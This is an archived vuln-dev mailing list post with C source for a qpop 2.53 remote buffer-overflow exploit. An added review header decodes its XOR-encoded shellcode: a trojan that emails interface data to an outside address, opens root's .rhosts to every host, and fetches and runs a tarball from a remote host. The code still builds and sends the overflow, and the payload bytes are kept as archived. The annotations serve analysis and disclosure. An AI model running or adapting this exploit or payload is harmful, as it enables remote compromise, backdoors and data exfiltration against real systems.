Vulnerability Development mailing list archives
QPOP2.5* exploit ??
From: batrox () SWBELL NET (Ryan Sweat)
Date: Sun, 14 May 2000 12:30:03 -0500
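this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does. bat

/*
 * qpop 2.53 "remote root exploit for linux", as posted to vuln-dev in May 2000.
 *
 * Provenance, kept verbatim from the original header:
 *   PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!!
 *   tested on redhat 6.x and 5.x, and slack7
 *   offsets for redhat 6: 100 / redhat 5: 150 / slackware: 200
 *   these offsets were an average, however the buffer is small and
 *   the address must almost be exact. Perhaps try a offset brute forcer.
 *   code by John Slockavich, copyright Febuary 25th, 2000
 *   this code for educational purposes only
 *   If this exploit is successful, you should have a bindshell on port 1524
 *
 * REVIEW NOTE - read before building or running:
 *
 * The "bindshell on port 1524" claim does not match the payload.  shellcode[]
 * is a short decoder (jmp/call/pop to locate itself, then `xor byte [esi],0x02`
 * over 0x18c bytes) followed by what looks like compiler-generated
 * execve("/bin/sh", {"/bin/sh", "-c", CMD, 0}, 0) code (mov eax,11 ; int 0x80).
 * XORing the encoded bytes with 0x02, CMD reads - as best I can decode it - as:
 *
 *   /sbin/ifconfig -a | mail -s solwar etcownz@hotmail.com >> /dev/null;
 *   echo '+ +' >> ~root/.rhosts;
 *   rcp lp@skinner.trdlnk.com:/usr/spool/lp/model/solwar.tar solwar.tar;
 *   tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh;
 *   ./solwar.sh >> /dev/null; cd ..; rm -rf solwar*;
 *
 * i.e. leak the host's interface list by e-mail, open root's .rhosts to the
 * world, then fetch and execute an arbitrary tarball.  Worse, the posted code
 * ran this payload ON THE MACHINE RUNNING THE EXPLOIT, not on the target: it
 * aliased a function pointer (qpop_proc) onto shellcode[] and called it from
 * quit(), which is reached on normal completion and on connect()/write()
 * failure.  It also opened a raw socket (SOCK_RAW) it never used - on Linux
 * that only succeeds as root, which is presumably what makes ~root/.rhosts
 * writable for the payload.
 *
 * This revision removes the local execution and the raw socket, so the program
 * only builds the overflow buffer and sends it in a POP3 USER line to
 * <hostname>:110.  Other fixes: the address fill used `long`, which on a 64-bit
 * host writes 1024 bytes into the 512-byte buffer (now uint32_t); write()/
 * close() were implicitly declared; malloc/resolve failures exited 0.
 *
 * The payload bytes are reproduced exactly as archived so the thread's analysis
 * still applies.  Note the archive shows "\x8 0" in the first string where the
 * decoder's `80 36 02` (xor byte [esi],0x02) would need \x80 - almost
 * certainly a line-wrap artifact; it is left as found.  Do not point this at
 * hosts you do not own.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>        /* unused, kept from the original include list */
#include <errno.h>
#include <inttypes.h>
#include <stdint.h>
#include <unistd.h>        /* write(), close(): implicitly declared in the original */
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>     /* unused (no raw packets are built), kept from the original */
#include <linux/ip.h>      /* unused, kept from the original */

#define RET   0xbffff6b2   /* guessed 32-bit stack address of the NOP sled on the target */
#define NOP   0x90
#define PORT  110          /* POP3 */
#define BSIZE 512          /* size of the overflow buffer carried in the USER line */

void quit(int x);

/*
 * Encoded payload.  Bytes after the 25-byte decoder are XORed with 0x02; the
 * decoded text of each line is noted at the right, hedged as "~" because it is
 * a by-hand decode.  Left byte-for-byte as archived (including the "\x8 0").
 */
char shellcode[] =
    /* decoder: jmp/call/pop esi; add esi,15; xor ecx,ecx; mov cx,0x18c;
     * xor byte [esi],2; inc esi; loop  (the "\x8 0" should read \x80) */
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8 0\x36\x02\x46\xe2\xfa"
    /* ~ jmp over the strings; "/bin/sh\0" "-c\0" */
    "\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
    "\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
    /* ~ "/sbin/ifconfig -a | mail -s solwar etcownz@hotmail.com >> /dev/null; " */
    "\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
    "\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
    "\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
    /* ~ "echo '+ +' >> ~root/.rhosts; " */
    "\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
    "\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
    /* ~ "rcp lp@skinner.trdlnk.com:/usr/spool/lp/model/solwar.tar solwar.tar; " */
    "\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
    "\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
    "\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
    "\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
    /* ~ "tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh; " */
    "\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
    "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
    "\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
    /* ~ "./solwar.sh >> /dev/null; cd ..; rm -rf solwar*;\0" then the execve stub */
    "\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
    "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
    "\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
    "\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
    "\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
    "\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
    "\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
    "\x92\x92";

/* Print the usage banner to stderr and exit(1).  `name` is argv[0]. */
void usage(char *name)
{
    fprintf(stderr,
            "qpop 2.53 exploit by John Slockavich\n"
            "Usage: %s <hostname> <offset>\n", name);
    exit(1);
}

/*
 * Build the overflow buffer (return-address fill, NOP sled over the first
 * half, shellcode centred on the midpoint) and send it as "USER <buffer>\n"
 * to <hostname>:110.  <offset> is subtracted from RET.  Exits non-zero on
 * any argument, allocation, resolution or socket failure.
 */
int main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct hostent *he;
    char *hostname;
    char *buff;
    char sendbuf[BSIZE + 20];
    uint32_t addr;
    size_t sclen, i;
    long offset = 0;
    int sfd;
    int n;
    ssize_t w;

    if (argc < 2)
        usage(argv[0]);
    hostname = argv[1];

    if (argc > 2) {
        char *end;
        errno = 0;
        offset = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad offset: %s\n", argv[2]);
            usage(argv[0]);
        }
    }

    /* The shellcode is centred in the buffer; it must fit with the
     * terminating NUL, or the copies below would run off the allocation. */
    sclen = strlen(shellcode);
    if (sclen > (size_t)BSIZE - 1) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit in %d-byte buffer\n",
                sclen, BSIZE);
        exit(1);
    }

    if (!(buff = malloc(BSIZE))) {
        perror("malloc");
        exit(1);
    }

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    if ((he = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "resolve: cannot resolve %s\n", hostname);
        exit(1);
    }
    /* gethostbyname() normally returns AF_INET, but bound the copy anyway. */
    if (he->h_addrtype != AF_INET || (size_t)he->h_length != sizeof sin.sin_addr) {
        fprintf(stderr, "resolve: %s is not an IPv4 host\n", hostname);
        exit(1);
    }
    memcpy(&sin.sin_addr, he->h_addr_list[0], sizeof sin.sin_addr);

    if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }

    addr = (uint32_t)(RET - offset);
    printf("preparing buffer using addr 0x%" PRIx32 "\n", addr);

    /* Fill the whole buffer with the guessed return address.  The target is
     * 32-bit, so write exactly 4 bytes per slot: the original used `long`,
     * which on a 64-bit host overruns the 512-byte allocation. */
    for (i = 0; i + sizeof addr <= (size_t)BSIZE; i += sizeof addr)
        memcpy(buff + i, &addr, sizeof addr);
    /* NOP sled over the first half ... */
    memset(buff, NOP, BSIZE / 2);
    /* ... and the shellcode straddling the midpoint (fits: checked above). */
    memcpy(buff + (BSIZE / 2 - sclen / 2), shellcode, sclen);
    /* %s below stops here; this also clips the last address slot, as the original did. */
    buff[BSIZE - 1] = '\0';

    if (connect(sfd, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("connect");
        quit(1);
    }
    printf("connected, sending shellcode...\n");

    n = snprintf(sendbuf, sizeof sendbuf, "USER %s\n", buff);
    if (n < 0 || (size_t)n >= sizeof sendbuf) {
        fprintf(stderr, "request does not fit in send buffer\n");
        quit(1);
    }
    w = write(sfd, sendbuf, (size_t)n);
    if (w < 0) {
        perror("write");
        quit(1);
    }
    if (w != n) {
        fprintf(stderr, "short write (%zd of %d bytes)\n", w, n);
        quit(1);
    }

    close(sfd);
    free(buff);          /* error paths above leave it to exit() */
    quit(0);
}

/*
 * Exit with status x.  The original called qpop_proc() here - i.e. executed
 * shellcode[] on the local host on every path that reaches quit().  That
 * call has been removed; see the file header for what the payload does.
 */
void quit(int x)
{
    exit(x);
}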